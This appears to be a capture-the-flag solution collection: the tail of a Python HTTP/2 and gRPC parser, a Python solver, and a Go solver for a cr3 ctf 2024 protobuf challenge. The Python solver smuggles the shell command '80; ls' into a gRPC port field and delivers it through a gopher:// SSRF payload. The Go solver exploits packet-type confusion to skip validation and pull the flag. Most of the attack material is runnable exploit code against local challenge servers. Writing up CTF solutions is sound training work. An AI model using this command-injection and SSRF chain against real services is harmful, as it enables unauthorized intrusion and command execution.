print(f" {C_HEADER}{name}:{C_RESET} {value}")
# Store in appropriate place depending on if this is a trailer
if is_trailer[stream_id]:
result['trailers'][stream_id] = headers
else:
result['headers'][stream_id] = headers
elif verbose:
print(f" {C_ERROR}Failed to decode headers{C_RESET}")
# Clear the header block now that we've processed it
del header_blocks[stream_id]
else:
current_stream_id = stream_id # Remember for CONTINUATION frames
elif frame_type == 9 and stream_id == current_stream_id: # CONTINUATION frame
if verbose:
print(f" {C_HEADER}CONTINUATION frame payload{C_RESET}")
# Add to the header block
if stream_id in header_blocks:
header_blocks[stream_id].extend(frame_payload)
# If this is the end of headers, decode them
if end_headers:
headers = decode_hpack_headers(frame_payload)
frame_info['decoded_headers'] = headers
if headers and verbose:
print(f" {C_HEADER}Decoded continuation headers:{C_RESET}")
for name, value in headers:
print(f" {C_HEADER}{name}:{C_RESET} {value}")
# Store in appropriate place depending on if this is a trailer
if is_trailer[stream_id]:
result['trailers'][stream_id] = headers
else:
result['headers'][stream_id] = headers
elif verbose:
print(f" {C_ERROR}Failed to decode continuation headers{C_RESET}")
# Clear the header block and reset current stream
del header_blocks[stream_id]
current_stream_id = None
# Process error frames (GOAWAY, RST_STREAM) only in verbose mode
elif verbose:
if frame_type == 7: # GOAWAY frame
if len(frame_payload) >= 8:
last_stream_id = int.from_bytes(frame_payload[0:4], byteorder='big') & 0x7FFFFFFF
error_code = int.from_bytes(frame_payload[4:8], byteorder='big')
print(f" {C_ERROR}GOAWAY:{C_RESET} Last Stream ID={last_stream_id}, Error={get_http2_error_name(error_code)}")
elif frame_type == 3: # RST_STREAM frame
if len(frame_payload) == 4:
error_code = int.from_bytes(frame_payload, byteorder='big')
print(f" {C_ERROR}RST_STREAM:{C_RESET} Error={get_http2_error_name(error_code)}")
else:
print(f" Payload: {frame_payload.hex()[:30]}..." if len(frame_payload) > 30 else frame_payload.hex())
result['frames'].append(frame_info)
pos += length # Move to next frame
# Extract gRPC status from trailers
for stream_id, trailers in result['trailers'].items():
for name, value in trailers:
if name == 'grpc-status':
status_code = int(value)
result['grpc_status'] = {
'code': status_code,
'name': get_grpc_status_name(status_code)
}
if verbose:
status_color = C_SUCCESS if status_code == 0 else C_ERROR
print(f"\n{status_color}gRPC Status: {status_code} ({get_grpc_status_name(status_code)}){C_RESET}")
if name == 'grpc-message':
if 'grpc_status' not in result:
result['grpc_status'] = {}
result['grpc_status']['message'] = value
if verbose:
print(f"{C_ERROR}gRPC Message: {value}{C_RESET}")
# Final summary only in verbose mode
if verbose:
print(f"\n{C_FRAME}=== SUMMARY ==={C_RESET}")
print(f"Total frames: {len(result['frames'])}")
print(f"Headers: {len(result['headers'])} streams")
print(f"Trailers: {len(result['trailers'])} streams")
print(f"Decoded messages: {len(result['messages'])}")
print(f"Errors: {len(result['errors'])}")
# For cleaner non-verbose output, just print the first message if found
if result['messages'] and not verbose:
msg = result['messages'][0]
print(f"{C_SUCCESS}Decoded {msg['type']}:{C_RESET} {msg['parsed']}")
return result
def get_http2_error_name(code):
"""Return the name of an HTTP/2 error code."""
codes = {
0: "NO_ERROR",
1: "PROTOCOL_ERROR",
2: "INTERNAL_ERROR",
3: "FLOW_CONTROL_ERROR",
4: "SETTINGS_TIMEOUT",
5: "STREAM_CLOSED",
6: "FRAME_SIZE_ERROR",
7: "REFUSED_STREAM",
8: "CANCEL",
9: "COMPRESSION_ERROR",
10: "CONNECT_ERROR",
11: "ENHANCE_YOUR_CALM",
12: "INADEQUATE_SECURITY",
13: "HTTP_1_1_REQUIRED"
}
return codes.get(code, f"UNKNOWN_ERROR_{code}")
def get_grpc_status_name(code):
"""Return the name of a gRPC status code."""
codes = {
0: "OK",
1: "CANCELLED",
2: "UNKNOWN",
3: "INVALID_ARGUMENT",
4: "DEADLINE_EXCEEDED",
5: "NOT_FOUND",
6: "ALREADY_EXISTS",
7: "PERMISSION_DENIED",
8: "RESOURCE_EXHAUSTED",
9: "FAILED_PRECONDITION",
10: "ABORTED",
11: "OUT_OF_RANGE",
12: "UNIMPLEMENTED",
13: "INTERNAL",
14: "UNAVAILABLE",
15: "DATA_LOSS",
16: "UNAUTHENTICATED"
}
return codes.get(code, f"UNKNOWN_STATUS_{code}")
def parse_grpc_request(raw_request, verbose=False, color=True):
"""
Decodes a raw gRPC HTTP/2 request and extracts relevant information.
Args:
raw_request: Raw HTTP/2 request bytes
verbose: If True, print detailed analysis information
color: If True, use colors in output
Returns:
Dictionary with decoded information (preface, frames, headers, message)
"""
# Color settings
C_FRAME = Fore.BLUE if color else ""
C_HEADER = Fore.GREEN if color else ""
C_DATA = Fore.CYAN if color else ""
C_ERROR = Fore.RED if color else ""
C_SUCCESS = Fore.GREEN if color else ""
C_RESET = Style.RESET_ALL if color else ""
if verbose:
print(f"Request length: {len(raw_request)}")
result = {
'preface': None,
'frames': [],
'headers': {},
'messages': [],
'errors': []
}
# Look for HTTP/2 connection preface
http2_preface_hex = "505249202a20485454502f322e300d0a0d0a534d0d0a0d0a"
http2_preface = bytes.fromhex(http2_preface_hex)
pos = 0
if len(raw_request) >= len(http2_preface) and raw_request.startswith(http2_preface):
result['preface'] = {
'position': 0,
'length': len(http2_preface),
'valid': True
}
if verbose:
print(f"{C_SUCCESS}Found valid HTTP/2 connection preface{C_RESET}")
pos = len(http2_preface)
else:
result['preface'] = {
'position': 0,
'valid': False
}
if verbose:
print(f"{C_ERROR}HTTP/2 connection preface not found{C_RESET}")
# Process HTTP/2 frames
current_stream_id = None
header_blocks = {} # Map stream_id -> accumulated header block
while pos < len(raw_request):
# Ensure we have enough bytes for a frame header
if pos + 9 > len(raw_request):
error_msg = f"Incomplete frame header at position {pos}"
result['errors'].append(error_msg)
if verbose:
print(f"{C_ERROR}{error_msg}{C_RESET}")
break
# Parse frame header
length = int.from_bytes(raw_request[pos:pos+3], byteorder='big')
frame_type = raw_request[pos+3]
flags = raw_request[pos+4]
stream_id = int.from_bytes(raw_request[pos+5:pos+9], byteorder='big') & 0x7FFFFFFF
end_headers = (flags & 0x04) != 0 # END_HEADERS flag
end_stream = (flags & 0x01) != 0 # END_STREAM flag
frame_info = {
'position': pos,
'length': length,
'type': frame_type,
'type_name': get_http2_frame_type_name(frame_type),
'flags': flags,
'stream_id': stream_id,
'end_headers': end_headers,
'end_stream': end_stream
}
if verbose:
print(f"\n{C_FRAME}Frame at position {pos}:{C_RESET}")
print(f" {C_FRAME}Type:{C_RESET} {get_http2_frame_type_name(frame_type)} ({frame_type})")
print(f" {C_FRAME}Length:{C_RESET} {length}")
print(f" {C_FRAME}Flags:{C_RESET} {flags:08b} (END_HEADERS: {end_headers}, END_STREAM: {end_stream})")
print(f" {C_FRAME}Stream ID:{C_RESET} {stream_id}")
pos += 9 # Move past frame header
# Process frame payload
if pos + length > len(raw_request):
error_msg = f"Incomplete frame payload (need {length} bytes, have {len(raw_request) - pos})"
frame_info['error'] = error_msg
result['errors'].append(error_msg)
result['frames'].append(frame_info)
if verbose:
print(f" {C_ERROR}{error_msg}{C_RESET}")
break
frame_payload = raw_request[pos:pos+length]
# Handle different frame types
if frame_type == 0: # DATA frame
if verbose:
print(f" {C_DATA}DATA frame payload:{C_RESET}")
# Use the dedicated decoder (without message types since we don't know the request type)
message_result = decode_grpc_data_frame_payload(
frame_payload,
verbose=verbose,
color=color
)
# Add decoded info to frame_info
frame_info.update({
'grpc_message': message_result
})
# For request, store the raw message data for further analysis
if message_result['valid']:
result['messages'].append({
'length': message_result['message_length'],
'compressed': message_result['compressed'],
'raw_data': message_result['message_data'],
'hex_data': message_result['hex_data']
})
elif frame_type == 1: # HEADERS frame
if verbose:
print(f" {C_HEADER}HEADERS frame payload:{C_RESET}")
# Start collecting header block for this stream
if stream_id not in header_blocks:
header_blocks[stream_id] = bytearray()
# Add this block
header_blocks[stream_id].extend(frame_payload)
# If this is the end of headers, decode them
if end_headers:
headers = decode_hpack_headers(header_blocks[stream_id])
frame_info['decoded_headers'] = headers
if headers:
if verbose:
print(f" {C_HEADER}Decoded headers:{C_RESET}")
for name, value in headers:
print(f" {C_HEADER}{name}:{C_RESET} {value}")
result['headers'][stream_id] = headers
# Extract service and method from headers if present
path = None
for name, value in headers:
if name == ':path':
path = value
break
if path and path.startswith('/'):
parts = path[1:].split('/')
if len(parts) >= 2:
result['service'] = parts[0]
result['method'] = parts[1]
if verbose:
print(f" {C_SUCCESS}Identified service:{C_RESET} {parts[0]}")
print(f" {C_SUCCESS}Identified method:{C_RESET} {parts[1]}")
elif verbose:
print(f" {C_ERROR}Failed to decode headers{C_RESET}")
# Clear the header block now that we've processed it
del header_blocks[stream_id]
else:
current_stream_id = stream_id # Remember for CONTINUATION frames
elif frame_type == 9 and stream_id == current_stream_id: # CONTINUATION frame
if verbose:
print(f" {C_HEADER}CONTINUATION frame payload{C_RESET}")
# Add to the header block
if stream_id in header_blocks:
header_blocks[stream_id].extend(frame_payload)
# If this is the end of headers, decode them
if end_headers:
headers = decode_hpack_headers(header_blocks[stream_id])
frame_info['decoded_headers'] = headers
if headers and verbose:
print(f" {C_HEADER}Decoded continuation headers:{C_RESET}")
for name, value in headers:
print(f" {C_HEADER}{name}:{C_RESET} {value}")
result['headers'][stream_id] = headers
elif verbose:
print(f" {C_ERROR}Failed to decode continuation headers{C_RESET}")
# Clear the header block and reset current stream
del header_blocks[stream_id]
current_stream_id = None
# Process other frame types (only in verbose mode)
elif verbose and frame_type == 4: # SETTINGS frame
print(f" {C_FRAME}SETTINGS frame{C_RESET}")
# Parse settings parameters (pairs of 16-bit identifiers and 32-bit values)
i = 0
settings = []
while i + 6 <= len(frame_payload):
identifier = int.from_bytes(frame_payload[i:i+2], byteorder='big')
value = int.from_bytes(frame_payload[i+2:i+6], byteorder='big')
setting_name = get_http2_setting_name(identifier)
settings.append((identifier, setting_name, value))
print(f" {C_FRAME}Setting:{C_RESET} {setting_name} ({identifier}) = {value}")
i += 6
frame_info['settings'] = settings
elif verbose:
print(f" Payload: {frame_payload.hex()[:30]}..." if len(frame_payload) > 30 else frame_payload.hex())
result['frames'].append(frame_info)
pos += length # Move to next frame
# Final summary only in verbose mode
if verbose:
print(f"\n{C_FRAME}=== SUMMARY ==={C_RESET}")
print(f"Total frames: {len(result['frames'])}")
print(f"Headers: {len(result['headers'])} streams")
print(f"Messages: {len(result['messages'])}")
print(f"Errors: {len(result['errors'])}")
if 'service' in result and 'method' in result:
print(f"Service: {result['service']}")
print(f"Method: {result['method']}")
# For cleaner non-verbose output, just print basic info
if not verbose:
if 'service' in result and 'method' in result:
print(f"{C_SUCCESS}Request for {result['service']}/{result['method']}{C_RESET}")
print(f"Frames: {len(result['frames'])}, Messages: {len(result['messages'])}")
return result
def get_http2_setting_name(identifier):
"""Return the name of an HTTP/2 setting identifier."""
settings = {
0x1: "HEADER_TABLE_SIZE",
0x2: "ENABLE_PUSH",
0x3: "MAX_CONCURRENT_STREAMS",
0x4: "INITIAL_WINDOW_SIZE",
0x5: "MAX_FRAME_SIZE",
0x6: "MAX_HEADER_LIST_SIZE",
0x8: "ENABLE_CONNECT_PROTOCOL"
}
return settings.get(identifier, f"UNKNOWN_{identifier}")
def decode_grpc_data_frame_payload(frame_payload, message_types=None, verbose=False, color=True):
"""
Decodes a gRPC data frame payload that contains a message with length prefixing.
Args:
frame_payload: Raw bytes of the DATA frame payload
message_types: List of protobuf message types to try parsing with (optional)
verbose: If True, print detailed analysis information
color: If True, use colors in output
Returns:
Dictionary with decoded information about the message
"""
# Color settings
C_DATA = Fore.CYAN if color else ""
C_ERROR = Fore.RED if color else ""
C_SUCCESS = Fore.GREEN if color else ""
C_RESET = Style.RESET_ALL if color else ""
result = {
'valid': False,
'error': None
}
# Check if we have enough bytes for gRPC message header (1 byte compressed flag + 4 bytes length)
if len(frame_payload) < 5:
result['error'] = f"Incomplete gRPC message header (need 5 bytes, have {len(frame_payload)})"
if verbose:
print(f" {C_ERROR}{result['error']}{C_RESET}")
return result
# Extract gRPC message framing
compressed = frame_payload[0]
message_length = int.from_bytes(frame_payload[1:5], byteorder='big')
result.update({
'valid': True,
'compressed': compressed,
'message_length': message_length,
})
if verbose:
print(f" {C_DATA}gRPC message framing:{C_RESET}")
print(f" Compressed: {compressed}")
print(f" Message length: {message_length} bytes")
# Check if we have the complete message
if len(frame_payload) < 5 + message_length:
result['error'] = f"Incomplete message data (need {message_length} bytes, have {len(frame_payload) - 5})"
if verbose:
print(f" {C_ERROR}{result['error']}{C_RESET}")
return result
# Extract the message data
message_data = frame_payload[5:5+message_length]
result['message_data'] = message_data
result['hex_data'] = message_data.hex()
if verbose:
print(f" {C_DATA}Message data (hex):{C_RESET}")
hex_data = message_data.hex()
# Format hex data in chunks for better readability
if len(hex_data) > 100:
formatted_hex = "\n ".join(
[hex_data[i:i+64] for i in range(0, min(300, len(hex_data)), 64)]
)
if len(hex_data) > 300:
formatted_hex += f"\n ... ({len(hex_data) - 300} more bytes)"
print(f" {formatted_hex}")
else:
print(f" {hex_data}")
# Try to parse with provided message types
if message_types:
for msg_type in message_types:
try:
message = msg_type()
message.ParseFromString(message_data)
result['parsed'] = {
'type': msg_type.__name__,
'message': message,
'text': str(message)
}
if verbose:
print(f" {C_SUCCESS}Parsed as {msg_type.__name__}:{C_RESET}")
print(f" {str(message).replace('\n', '\n ')}")
break
except Exception as e:
if verbose:
print(f" {C_ERROR}Failed to parse as {msg_type.__name__}: {e}{C_RESET}")
# If there's remaining data in the frame payload, note it
if len(frame_payload) > 5 + message_length:
remaining = len(frame_payload) - (5 + message_length)
result['remaining_bytes'] = remaining
if verbose:
print(f" {C_DATA}Note: {remaining} bytes remaining after message{C_RESET}")
return resultsolve.py
import asyncio
import httpx
# python3 -m grpc_tools.protoc -I. --python_out=. --grpc_python_out=. ./challenge/live_data.proto
from challenge.live_data_pb2 import HealthCheckRequest
from pwn import *
from colorama import Fore, Style, init
import parser
URL = "http://localhost:1337"
init() # Initialize colorama
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.AsyncClient(base_url=url)
def merge_fates(self, json_data: dict):
return self.c.post("/merge-fates", json=json_data)
def connect_realm(self):
return self.c.get("/connect-realm")
class API(BaseAPI):
...
def quote(payload: bytes):
"quote all the characters in the payload"
res = ""
for c in payload:
res += f"%{c:02x}"
return res
async def main():
api = API()
payload = parser.create_grpc_http2_request(
HealthCheckRequest(ip="127.0.0.1", port="80; ls"),
"live.LiveDataService",
"CheckHealth"
)
print(payload)
r = remote("localhost", 50051)
r.send(payload)
r.interactive()
payload_urlencoded = quote(payload)
gopher_payload = "gopher://localhost:50051/_"+payload_urlencoded
print(gopher_payload)
res = await api.merge_fates({"class": {"superclass": {"realm_url": gopher_payload}}})
print(res.text)
res = await api.connect_realm()
print(res.text)
if __name__ == "__main__":
asyncio.run(main())
Protobuf Challenge from cr3 ctf 2024
This only works locally because the server behaves differently. There are actually two types of identifiers from the package we send: one for the handler and one for the message type. To create type confusion, we can set the message type to something else. For example, I use the 'RequestResource' message type to trigger the exception and bypass the validation function.
solver:
to generate protocol buffer go
protoc -I=. --proto_path=/ --go_out=. ./protocol.proto
package main
import (
"log"
"time"
protobuf "golang/spurdo_leveling"
"github.com/gorilla/websocket"
"google.golang.org/protobuf/proto"
)
func con() {
spurdoWS, _, err := websocket.DefaultDialer.Dial("ws://localhost:13388/ws", nil)
// spurdoWS, _, err := websocket.DefaultDialer.Dial("wss://spurdo-ebinling.1337.sb/ws", nil)
if err != nil {
log.Fatal("Error connecting to WebSocket:", err)
}
defer spurdoWS.Close()
sendMessage := func(packetType protobuf.PacketId, messageType protobuf.PacketId, val []byte) {
msg := &protobuf.Packet{
Type: messageType,
Value: val,
}
packet := &protobuf.Packet{
Type: packetType,
Value: val,
}
messageBytes, err := proto.Marshal(msg)
if err != nil {
log.Fatal("Error marshaling message:", err)
}
byteArray := append([]byte{0x6d, 0x65, 0x6d, 0x65}, byte(packet.Type&0xff), byte((msg.Type>>8)&0xff))
byteArray = append(byteArray, messageBytes...)
err = spurdoWS.WriteMessage(websocket.BinaryMessage, byteArray)
if err != nil {
log.Fatal("Error sending message:", err)
}
}
waveEndMod := func(mobs []*protobuf.Wave_Mob) {
message := &protobuf.Wave{
Number: 1,
}
mobsList := []*protobuf.Wave_Mob{}
for _, mob := range mobs {
mob = &protobuf.Wave_Mob{
Damage: mob.Damage,
Xp: mob.Xp,
Health: 0,
Invincible: mob.Invincible,
}
mobsList = append(mobsList, mob)
}
message.Mobs = mobsList
message.CurrentTime = float64(time.Now().UnixNano())
msg, err := proto.Marshal(message)
if err != nil {
log.Fatal(err)
}
sendMessage(protobuf.PacketId_PACKET_ID_WAVE, protobuf.PacketId_PACKET_ID_WAVE, msg)
}
go func() {
wave, _ := proto.Marshal(&protobuf.Wave{
Number: 0,
Mobs: []*protobuf.Wave_Mob{},
CurrentTime: 0,
})
sendMessage(protobuf.PacketId_PACKET_ID_WAVE, protobuf.PacketId_PACKET_ID_WAVE, wave)
levelUp, _ := proto.Marshal(&protobuf.CLevelUp{Item: 300})
requestResource, _ := proto.Marshal(&protobuf.CRequestResource{Item: "data:,cr3{"})
time.Sleep(3 * time.Second)
sendMessage(protobuf.PacketId_PACKET_ID_LEVEL_UP, protobuf.PacketId_PACKET_ID_LEVEL_UP, levelUp)
for i := 0; i < 6; i++ {
sendMessage(protobuf.PacketId_PACKET_ID_INVENTORY_EQUIP, protobuf.PacketId_PACKET_ID_REQUEST_RESOURCE, requestResource)
}
sendMessage(protobuf.PacketId_PACKET_ID_INVENTORY, protobuf.PacketId_PACKET_ID_INVENTORY, []byte{})
sendMessage(protobuf.PacketId_PACKET_ID_REQUEST_RESOURCE, protobuf.PacketId_PACKET_ID_REQUEST_RESOURCE, requestResource)
}()
mobs := []*protobuf.Wave_Mob{}
for {
_, msg, err := spurdoWS.ReadMessage()
if err != nil {
log.Println("Error reading message:", err)
return
}
packet := &protobuf.Packet{}
err = proto.Unmarshal(msg[6:], packet)
if err != nil {
log.Println("Error unmarshaling packet:", err)
continue
}
switch protobuf.PacketId(packet.Type) {
case protobuf.PacketId_PACKET_ID_WAVE:
wave := &protobuf.Wave{}
err = proto.Unmarshal(packet.Value, wave)
if err != nil {
log.Println("Error unmarshaling wave:", err)
continue
}
if len(mobs) == 0 {
mobs = wave.Mobs
waveEndMod(wave.Mobs)
} else {
waveEndMod(mobs)
}
case protobuf.PacketId_PACKET_ID_INVENTORY:
inventory := &protobuf.SInventory{}
err = proto.Unmarshal(packet.Value, inventory)
if err != nil {
log.Println("Error unmarshaling inventory:", err)
continue
}
log.Println("Inventory:", inventory)
case protobuf.PacketId_PACKET_ID_INVENTORY_EQUIP:
inventoryEquip := &protobuf.SInventoryEquip{}
err = proto.Unmarshal(packet.Value, inventoryEquip)
if err != nil {
log.Println("Error unmarshaling inventory equip:", err)
continue
}
log.Println("Inventory Equip:", inventoryEquip)
case protobuf.PacketId_PACKET_ID_LEVEL_UP:
levelUp := &protobuf.SLevelUp{}
err = proto.Unmarshal(packet.Value, levelUp)
if err != nil {
log.Println("Error unmarshaling level up:", err)
continue
}
case protobuf.PacketId_PACKET_ID_ACHIEVEMENT_UNLOCKED:
achievementUnlocked := &protobuf.SAchievementUnlocked{}
err = proto.Unmarshal(packet.Value, achievementUnlocked)
if err != nil {
log.Println("Error unmarshaling achievement unlocked:", err)
continue
}
log.Println("Achievement unlocked:", achievementUnlocked.Name)
case protobuf.PacketId_PACKET_ID_REQUEST_RESOURCE:
requestResource := &protobuf.SRequestResource{}
err = proto.Unmarshal(packet.Value, requestResource)
if err != nil {
log.Println(err)
}
log.Println(requestResource)
}
}
}
func main() {
go con()
select {}
}